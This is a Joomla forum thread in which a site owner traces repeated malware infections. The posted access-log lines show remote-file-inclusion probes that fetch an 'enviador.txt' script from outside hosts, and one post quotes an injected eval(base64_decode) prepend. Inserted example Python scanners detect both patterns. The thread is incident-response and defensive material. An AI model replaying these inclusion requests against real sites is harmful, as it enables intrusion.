The Joomla! Forum ™
PostPosted: Wed Mar 07, 2012 5:54 pm 
Joomla! Apprentice

Joined: Wed Mar 07, 2012 5:26 pm
Posts: 7
I'm not looking for advice per se (but any would be appreciated), as I'll probably bite the bullet and try to port over to Joomla 2.5 while I'm having to reinstall anyway, but I thought maybe this information might be helpful to the developers. It may already have been covered in security updates; I'm not sure.

Anyway, my site has been repeatedly suspended by the hosting provider: they do regular scans and malware has been detected. I upgrade Joomla etc. and change the passwords, but then it happens again. Admittedly, I thought I had the latest version, but then afterwards found out that their cPanel / Fantastico was only up to 1.5.23.

What was happening was that code along the lines of eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk.... etc. was being inserted at the top of a number of pages. At first it was just index.php, index2.php and defines.php.

I found in the access logs what I believe to be the source so thought I'd share it here:

202.153.163.65 - - [05/Mar/2012:23:52:44 +1100] "GET /index.php?option=http://www.<malicioussite>.com/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 404 1390 "-" "-"

xg.com.au being my site, obviously. I also found this page where someone has dissected some of the malicious code: http://206.214.216.120/forum/viewthread ... ad_id=1035

Hope this is helpful for someone. I'll just take my database and start the arduous task of starting from scratch.


Last edited by mandville on Wed Mar 07, 2012 7:43 pm, edited 1 time in total.
altered sites breached
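An added check for the prepended eval(base64_decode("...")) line the post describes; this is example code, not from the thread or from Joomla. It walks a web root, looks at the head of each .php file for that construct, and decodes the base64 argument so the first decoded characters can be read (the fragment quoted in the post decodes, once padded, to error_reporting(0), a call that silences PHP errors). The sample tree it builds is constructed, and scan_tree, inspect_file, decode_preview and build_sample_tree are this example's own names.

```python
"""Find PHP files that start with an eval(base64_decode("...")) prepend.

Example code, not from the thread or from Joomla. The post describes such a
line being inserted at the top of index.php, index2.php and defines.php.
This walks a web root, checks the head of every .php file for that construct,
and base64-decodes the argument so the first decoded characters can be read.
"""
import base64
import binascii
import os
import re
import tempfile

INJECT_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)',
    re.IGNORECASE,
)
HEAD_BYTES = 4096  # the prepend sits at the top, so the file head is enough


def decode_preview(b64, limit=80):
    """Decode a base64 payload (repairing missing '=' padding) and return its start."""
    padded = b64 + "=" * (-len(b64) % 4)
    try:
        raw = base64.b64decode(padded)
    except binascii.Error:
        return "<undecodable>"
    return raw.decode("utf-8", "replace")[:limit]


def inspect_file(path):
    """Return a finding for each injected eval(base64_decode()) in the file head."""
    with open(path, "rb") as fh:
        head = fh.read(HEAD_BYTES).decode("latin-1")
    hits = []
    for m in INJECT_RE.finditer(head):
        hits.append({
            "path": path,
            "line": head.count("\n", 0, m.start()) + 1,
            "preview": decode_preview(m.group(1)),
        })
    return hits


def scan_tree(root):
    """Walk `root` and collect findings from every .php file, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                findings.extend(inspect_file(os.path.join(dirpath, name)))
    return sorted(findings, key=lambda h: h["path"])


def build_sample_tree():
    """Create a constructed web root: one prepended index.php, one clean file."""
    root = tempfile.mkdtemp(prefix="prepend_demo_")
    # Constructed payload: only an error-silencing call and a comment.
    payload = base64.b64encode(
        b"\r\nerror_reporting(0);\r\n// constructed placeholder body"
    ).decode("ascii")
    infected = '<?php eval(base64_decode("%s")); ?>\n<?php\n// original file follows\n' % payload
    clean = "<?php\n// a clean file\necho 'hello';\n"
    os.makedirs(os.path.join(root, "includes"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(infected)
    with open(os.path.join(root, "includes", "defines.php"), "w") as fh:
        fh.write(clean)
    return root


if __name__ == "__main__":
    # The fragment quoted in the post decodes to a PHP error-silencing call.
    print(repr(decode_preview("DQplcnJvcl9yZXBvcnRpbmcoMCk")))
    for hit in scan_tree(build_sample_tree()):
        print(hit["path"], "line", hit["line"], "->", repr(hit["preview"]))
```

Run it against the real document root in place of the constructed tree; anything it reports should be compared with a clean copy of the same Joomla release before the file is touched, since the decoded preview only shows the first few dozen characters of the payload.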



PostPosted: Wed Mar 07, 2012 7:42 pm 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11641
Location: The Girly Side of Joomla in Sussex
Now those logs show that was a 404, meaning the file wasn't found, unless you find similar with a 200 code.

Also, if I said the letters libwww, would you jump up and down shouting "that's it"?
Run the FPA if you can: viewforum.php?f=621

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}



PostPosted: Thu Mar 08, 2012 2:58 am 
Joomla! Apprentice

Joined: Wed Mar 07, 2012 5:26 pm
Posts: 7
If you said libwww I wouldn't know what you were talking about; I'm not all up on the technical side of these things. I just looked at the access logs from between when I understood the site to be clear and when the hosting provider suspended it. I went back from there, and that was the closest suspicious thing to that event that I found.

I'll try running that FPA, but I'm not sure if it will be successful as a heap of the Joomla files have been quarantined. Thanks for the advice!



PostPosted: Thu Mar 08, 2012 9:10 am 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11641
Location: The Girly Side of Joomla in Sussex
Just see if that is mentioned in your logs.
Also run through the checklist linked.


PostPosted: Thu Mar 08, 2012 5:20 pm 
Joomla! Apprentice

Joined: Wed Mar 07, 2012 5:26 pm
Posts: 7
Ok, ran through the checklist as best I could, and ran the FPA; output included below.

I couldn't find libwww in the logs, but I did find more entries from that <self-censored>, including one with a 200 code (3rd entry). These were all the pertinent entries (host details hidden as above):

Code:
202.153.163.65 - - [05/Mar/2012:23:52:44 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 404 1390 "-" "-"

60.251.136.8 - - [06/Mar/2012:01:21:20 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 404 1390 "-" "-"

218.219.159.104 - - [06/Mar/2012:03:51:29 +1100] "GET /forum/index.php?board=http://<malicioussite2>/img/suites/enviador.txt?&servidor=www.xg.com.au/forum/index.php?board=&para=premmy35@gmail.com HTTP/1.1 " 200 48568 "-" "-"

218.219.159.104 - - [06/Mar/2012:04:22:14 +1100] "GET /index.php?option=http://<malicioussite2>/img/suites/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 404 1390 "-" "-"

60.251.136.8 - - [06/Mar/2012:06:46:14 +1100] "GET /index.php?view=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?view=&para=premmy35@gmail.com HTTP/1.1 " 302 361 "-" "-"

60.251.136.8 - - [06/Mar/2012:10:35:42 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:11:49:30 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:12:06:35 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:15:00:17 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:16:00:25 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:16:51:11 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"



Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 9th March 2012 wrote:
[07-Mar-2012 20:43:27] PHP Fatal error: require_once() [<a href=\'function.require\'>function.require</a>]: Failed opening required \'/home/wf48951/public_html/includes/framework.php\' (include_path=\'.:/usr/local/lib/php/PEAR:/usr/lib/php:/usr/local/lib/php\') in /home/wf48951/public_html/index.php on line 22
Forum Post Assistant (v1.2.0) : 9th March 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 1.5.23-Stable (senu takaa ama baji) 04-March-2011
Joomla! Configured :: Yes | Read-Only (444) | Owner: wf48951 (uid: 32113/gid: 32114) | Group: wf48951 (gid: 32114) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-238.19.1.el5xen | Technology: i686 | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /home/wf48951/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 07th March 2012 20:43:27. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 10M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 32M

MySQL Configuration :: Version: 5.0.92-community-log (Client:5.0.92) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.06 MiB | #of _FPA_TABLE: 62
Detailed Environment :: wrote:
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | session () | iconv () | standard (5.2.17) | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | posix () | pspell () | Reflection (0.1) | imap () | SPL (0.2) | mysqli (0.1) | soap () | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | zip (1.8.11) | cgi () | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions ::

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Templates Discovered :: wrote:
Templates :: SITE :: JA_Purity (1.2.0) | WF1.5 (1.5.0) | beez (1.0.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: Khepri (1.0) |
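A way to pull these probes out of a whole access log rather than eyeballing them, as an added example that is not part of the thread or of the FPA tool: it parses lines in the Apache format shown in the Code block above, flags any query parameter whose value is an absolute URL (the option=http://... pattern), and separates the hits the server actually answered with a 2xx from the 404/302 misses the earlier reply asks about. The log lines, IPs, hostnames and e-mail address in it are constructed placeholders modelled on the posted entries; parse_line, rfi_params, scan and summarize are this example's own names.

```python
"""Flag remote-file-inclusion (RFI) probes in an Apache access log.

Example code, not from the thread. The requests posted above carry a full URL
in a query parameter (option=http://.../enviador.txt). This scanner parses
each line, splits the query string, and reports every parameter whose value
is an absolute http/https/ftp URL, keeping the HTTP status so that answered
(2xx) requests can be separated from 404/302 misses.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined format: ip ident user [ts] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample lines modelled on the ones in the thread; the IPs are
# documentation ranges and the hostnames/e-mail address are placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Mar/2012:23:52:44 +1100] "GET /index.php?option=http://attacker-host.example/files/enviador.txt?&servidor=www.example.com/index.php?option=&para=drop@example.invalid HTTP/1.1 " 404 1390 "-" "-"
198.51.100.7 - - [06/Mar/2012:03:51:29 +1100] "GET /forum/index.php?board=http://attacker-host.example/img/suites/enviador.txt?&servidor=www.example.com/forum/index.php?board=&para=drop@example.invalid HTTP/1.1 " 200 48568 "-" "-"
203.0.113.10 - - [06/Mar/2012:06:46:14 +1100] "GET /index.php?view=http://attacker-host.example/files/enviador.txt?&servidor=www.example.com/index.php?view=&para=drop@example.invalid HTTP/1.1 " 302 361 "-" "-"
192.0.2.5 - - [06/Mar/2012:08:00:00 +1100] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def rfi_params(target):
    """Return (name, value) pairs for query parameters whose value is a remote URL."""
    query = urlsplit(target).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if value.lower().startswith(REMOTE_SCHEMES)
    ]


def scan(lines):
    """Return one finding per (line, parameter) where a remote URL was injected."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rfi_params(rec["target"]):
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "param": name,
                "url": value,
                "status": rec["status"],
                # 2xx means the server actually ran the request; those are the
                # ones worth matching against the infection timeline.
                "served": 200 <= rec["status"] < 300,
            })
    return findings


def summarize(findings):
    """Count probes per source IP and pull out the ones that got a 2xx."""
    return {
        "total": len(findings),
        "by_ip": dict(Counter(f["ip"] for f in findings)),
        "served": [f for f in findings if f["served"]],
    }


if __name__ == "__main__":
    result = summarize(scan(SAMPLE_LOG.splitlines()))
    print("RFI probes:", result["total"], "by IP:", result["by_ip"])
    for f in result["served"]:
        print("ANSWERED", f["ts"], f["ip"], f["param"], "=", f["url"], f["status"])
```

Feed it the real log with scan(open(path).readlines()); the "served" list is the subset to line up against the times the hosting provider's scanner first reported the altered files, since a 404 or 302 on its own shows only that a probe arrived, not that the include ran.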


PostPosted: Thu Mar 08, 2012 6:09 pm 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11641
Location: The Girly Side of Joomla in Sussex
Let us look at this the other way round. Was the enviador file found on your server? In a "files" folder? As it could be that it was uploaded to you and you are being used as the malicious middle man.

That's why there are so many 404/302 (not found) errors.

On the basis that you have followed the checklist's 7 safe route to recovery, then install Akeeba Admin Tools and check/reset all the permissions.
Follow the rest of the checklist, esp. the cron part.

Would also like to see your extensions list.


PostPosted: Tue Mar 13, 2012 3:16 pm 
Joomla! Fledgling

Joined: Tue Mar 13, 2012 3:10 pm
Posts: 1
Hello,

I am not running Joomla, but I frequently detect hacking attempts on my websites using the enviador.txt script, originating from Joomla websites. I have been trying to call Google to have this e-mail address premmy35@gmail.com blocked, and legal action needs to be taken against this person(s). I filled in the abuse form but nothing ensued from it.

Can anyone help? This needs to stop now!

Do I need to call the FBI???

Sincerely,
